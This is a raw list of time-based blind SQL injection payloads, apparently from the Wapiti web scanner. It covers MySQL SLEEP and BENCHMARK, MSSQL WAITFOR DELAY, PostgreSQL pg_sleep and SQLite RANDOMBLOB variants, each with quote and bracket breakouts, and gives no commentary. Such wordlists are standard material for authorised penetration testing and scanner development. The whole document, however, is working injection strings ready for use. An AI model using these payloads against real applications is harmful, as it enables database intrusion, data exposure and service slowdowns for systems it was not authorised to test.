# from wapiti
sleep(40)#
1 or sleep(40)#
" or sleep(40)#
' or sleep(40)#
" or sleep(40)="
' or sleep(40)='
1) or sleep(40)#
") or sleep(40)="
') or sleep(40)='
1)) or sleep(40)#
")) or sleep(40)="
')) or sleep(40)='
;waitfor delay '0:0:40'--
);waitfor delay '0:0:40'--
';waitfor delay '0:0:40'--
";waitfor delay '0:0:40'--
');waitfor delay '0:0:40'--
");waitfor delay '0:0:40'--
));waitfor delay '0:0:40'--
'));waitfor delay '0:0:40'--
"));waitfor delay '0:0:40'--
benchmark(10000000,MD40(1))#
1 or benchmark(10000000,MD40(1))#
" or benchmark(10000000,MD40(1))#
' or benchmark(10000000,MD40(1))#
1) or benchmark(10000000,MD40(1))#
") or benchmark(10000000,MD40(1))#
') or benchmark(10000000,MD40(1))#
1)) or benchmark(10000000,MD40(1))#
")) or benchmark(10000000,MD40(1))#
')) or benchmark(10000000,MD40(1))#
pg_sleep(40)--
1 or pg_sleep(40)--
" or pg_sleep(40)--
' or pg_sleep(40)--
1) or pg_sleep(40)--
") or pg_sleep(40)--
') or pg_sleep(40)--
1)) or pg_sleep(40)--
")) or pg_sleep(40)--
')) or pg_sleep(40)--
AND (SELECT * FROM (SELECT(SLEEP(40)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(40)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(40)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(40)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(40)))nQIP)#
SLEEP(40)#
SLEEP(40)--
SLEEP(40)="
SLEEP(40)='
or SLEEP(40)
or SLEEP(40)#
or SLEEP(40)--
or SLEEP(40)="
or SLEEP(40)='
waitfor delay '00:00:040'
waitfor delay '00:00:040'--
waitfor delay '00:00:040'#
benchmark(400000000,MD5(1))
benchmark(400000000,MD5(1))--
benchmark(400000000,MD5(1))#
or benchmark(400000000,MD5(1))
or benchmark(400000000,MD5(1))--
or benchmark(400000000,MD5(1))#
pg_SLEEP(40)
pg_SLEEP(40)--
pg_SLEEP(40)#
or pg_SLEEP(40)
or pg_SLEEP(40)--
or pg_SLEEP(40)#
'\"
AnD SLEEP(40)
AnD SLEEP(40)--
AnD SLEEP(40)#
&&SLEEP(40)
&&SLEEP(40)--
&&SLEEP(40)#
' AnD SLEEP(40) ANd '1
'&&SLEEP(40)&&'1
ORDER BY SLEEP(40)
ORDER BY SLEEP(40)--
ORDER BY SLEEP(40)#
(SELECT * FROM (SELECT(SLEEP(40)))ecMj)
(SELECT * FROM (SELECT(SLEEP(40)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(40)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(4000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(4000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(4000000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
